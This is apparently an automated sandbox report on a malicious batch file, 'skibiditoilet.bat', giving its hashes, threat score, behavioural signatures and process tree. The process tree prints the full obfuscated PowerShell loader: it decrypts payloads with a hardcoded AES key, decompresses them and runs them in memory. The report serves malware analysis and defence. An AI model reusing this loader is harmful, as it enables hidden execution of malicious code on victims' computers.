Analysis
-
max time kernel
117s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20-11-2024 17:28
Static task
static1
Behavioral task
behavioral1
Sample
skibiditoilet.bat
Resource
win7-20240903-en
windows7-x64
4 signatures
150 seconds
General
-
Target
skibiditoilet.bat
-
Size
395KB
-
MD5
fbcad94ee92cc636d8bba4f642130122
-
SHA1
e6efade17853c9d8cd4948c066d305ae7eb63f92
-
SHA256
14ff4d8940a0742974ca662986e8c421e2b0ee7c4dd3bad42133a06d83ff01e7
-
SHA512
a8aecd98d6ec6ccd40c76878d2f5669cb0260c9717af332adb053c7709a17669dc1d8906dae48081fc8e0f3712b462af013187975951b4b9a618ca1e08319de4
-
SSDEEP
6144:ZVjmIVN5c/teuyotWSdLVnUUSONjj3CRTPWYMGHGB/CERDTnL98UVzeBy/Dvi:TjVN5c/19koVUwjZYM5B/CER7VCui
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2272 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2272 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exedescription pid process target process PID 2736 wrote to memory of 1680 2736 cmd.exe cmd.exe PID 2736 wrote to memory of 1680 2736 cmd.exe cmd.exe PID 2736 wrote to memory of 1680 2736 cmd.exe cmd.exe PID 2736 wrote to memory of 2272 2736 cmd.exe powershell.exe PID 2736 wrote to memory of 2272 2736 cmd.exe powershell.exe PID 2736 wrote to memory of 2272 2736 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\skibiditoilet.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('izPfV11HfqMvi1lIFXzMNUJXr5RyKqW+SGrEDG8GF3A='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dS+E0kIPSP6vVymeMj9P5A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ldSZb=New-Object System.IO.MemoryStream(,$param_var); $oriEw=New-Object System.IO.MemoryStream; $QUSyd=New-Object System.IO.Compression.GZipStream($ldSZb, [IO.Compression.CompressionMode]::Decompress); $QUSyd.CopyTo($oriEw); $QUSyd.Dispose(); $ldSZb.Dispose(); $oriEw.Dispose(); $oriEw.ToArray();}function execute_function($param_var,$param2_var){ $QWeoB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DDVCK=$QWeoB.EntryPoint; $DDVCK.Invoke($null, $param2_var);}$FyUxZ = 'C:\Users\Admin\AppData\Local\Temp\skibiditoilet.bat';$host.UI.RawUI.WindowTitle = $FyUxZ;$JhzTL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($FyUxZ).Split([Environment]::NewLine);foreach ($kGcTn in $JhzTL) { if ($kGcTn.StartsWith('ZXAGlRuoMrnYZUvTYuCb')) { $GmyZF=$kGcTn.Substring(20); break; }}$payloads_var=[string[]]$GmyZF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:1680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2272
-